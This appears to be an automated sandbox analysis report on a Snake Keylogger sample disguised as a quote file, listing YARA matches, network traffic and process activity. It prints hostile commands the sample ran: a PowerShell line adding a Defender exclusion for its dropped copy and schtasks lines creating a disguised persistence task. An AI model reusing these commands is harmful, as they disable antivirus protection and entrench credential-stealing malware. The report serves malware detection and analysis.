                Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.0000000003245000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003295000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.00000000032C9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.000000001324B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.00000000131F9000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.4002386842.000000001337D000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.4008986367.00000000133CC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003427000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000033D3000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003422000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/8
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
                Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 64729 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 64742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64736
                Source: unknownNetwork traffic detected: HTTP traffic on port 64736 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64757
                Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64752
                Source: unknownNetwork traffic detected: HTTP traffic on port 64757 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64776
                Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
                Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
                Source: unknownNetwork traffic detected: HTTP traffic on port 64747 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 64776 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64747
                Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64729
                Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 64742
                Source: unknownNetwork traffic detected: HTTP traffic on port 64752 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49917 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:64757 version: TLS 1.2

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Contains functionality to log keystrokes (.Net Source)
                Source: Quote_items1&2.bat.exe, HookManager.cs.Net Code: EnsureSubscribedToGlobalKeyboardEvents
                Source: wJFLKBSbTtvP.exe.0.dr, HookManager.cs.Net Code: EnsureSubscribedToGlobalKeyboardEvents

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Quote_items1&2.bat.exe PID: 3704, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: Quote_items1&2.bat.exe PID: 3884, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 0_2_00007FFD344EE9400_2_00007FFD344EE940
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 0_2_00007FFD344E08ED0_2_00007FFD344E08ED
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 0_2_00007FFD344EC2F30_2_00007FFD344EC2F3
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeCode function: 10_2_00007FFD34508A6510_2_00007FFD34508A65
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 12_2_00007FFD345008ED12_2_00007FFD345008ED
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 12_2_00007FFD3450E9C012_2_00007FFD3450E9C0
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 12_2_00007FFD3450C98912_2_00007FFD3450C989
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 12_2_00007FFD3450C21D12_2_00007FFD3450C21D
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 12_2_00007FFD3450C31812_2_00007FFD3450C318
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 12_2_00007FFD3450C39012_2_00007FFD3450C390
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 12_2_00007FFD3450C37012_2_00007FFD3450C370
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeCode function: 15_2_00007FFD34518A6515_2_00007FFD34518A65
                Source: Quote_items1&2.bat.exeStatic PE information: No import functions for PE file found
                Source: wJFLKBSbTtvP.exe.0.drStatic PE information: No import functions for PE file found
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameReactionDiffusion.dll0 vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,\\StringFileInfo\\040904B0\\OriginalFilename vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameuyCa.exef# vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ,\\StringFileInfo\\000004B0\\OriginalFilename vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003BF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2323276823.0000000001100000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameReactionDiffusion.dll0 vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCamden.exe. vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2324262660.0000000003E1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCamden.exe. vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000000.2137986969.0000000000702000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameuyCa.exef# vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2326607916.0000000015685000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameGreenEnergy.dll@ vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 00000000.00000002.2334172628.000000001EBA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameGreenEnergy.dll@ vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCamden.exe. vs Quote_items1&2.bat.exe
                Source: Quote_items1&2.bat.exeBinary or memory string: OriginalFilenameuyCa.exef# vs Quote_items1&2.bat.exe
                Source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.Quote_items1&2.bat.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Quote_items1&2.bat.exe.17205b60.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.Quote_items1&2.bat.exe.171c2720.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0000000A.00000002.4009819088.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2326607916.00000000171C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Quote_items1&2.bat.exe PID: 3704, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: Quote_items1&2.bat.exe PID: 3884, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Quote_items1&2.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: wJFLKBSbTtvP.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/11@4/4
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeFile created: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4044:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5868:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeMutant created: \Sessions\1\BaseNamedObjects\CVzTfkmlxZExDSwWir
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7312:120:WilError_03
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeFile created: C:\Users\user\AppData\Local\Temp\tmpC8F3.tmpJump to behavior
                Source: Quote_items1&2.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: Quote_items1&2.bat.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000034FF000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000034D3000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.000000000350B000.00000004.00000800.00020000.00000000.sdmp, Quote_items1&2.bat.exe, 0000000A.00000002.3995487967.00000000034B5000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003520000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003511000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003557000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.0000000003502000.00000004.00000800.00020000.00000000.sdmp, wJFLKBSbTtvP.exe, 0000000F.00000002.3998107781.000000000354B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: Quote_items1&2.bat.exeVirustotal: Detection: 45%
                Source: Quote_items1&2.bat.exeReversingLabs: Detection: 45%
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeFile read: C:\Users\user\Desktop\Quote_items1&2.bat.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\Quote_items1&2.bat.exe "C:\Users\user\Desktop\Quote_items1&2.bat.exe"
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe"
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp"
                Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess created: C:\Users\user\Desktop\Quote_items1&2.bat.exe C:\Users\user\Desktop\Quote_items1&2.bat.exe
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpFBBB.tmp"
                Source: C:\Windows\System32\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exeProcess created: C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\wJFLKBSbTtvP.exe"Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\wJFLKBSbTtvP" /XML "C:\Users\user\AppData\Local\Temp\tmpC8F3.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\Quote_items1&2.bat.exeProcess created: C:\Users\user\Desktop\Quote_items1&2.bat.exe C:\Users\user\Desktop\Quote_items1&2.bat.exeJump to behavior
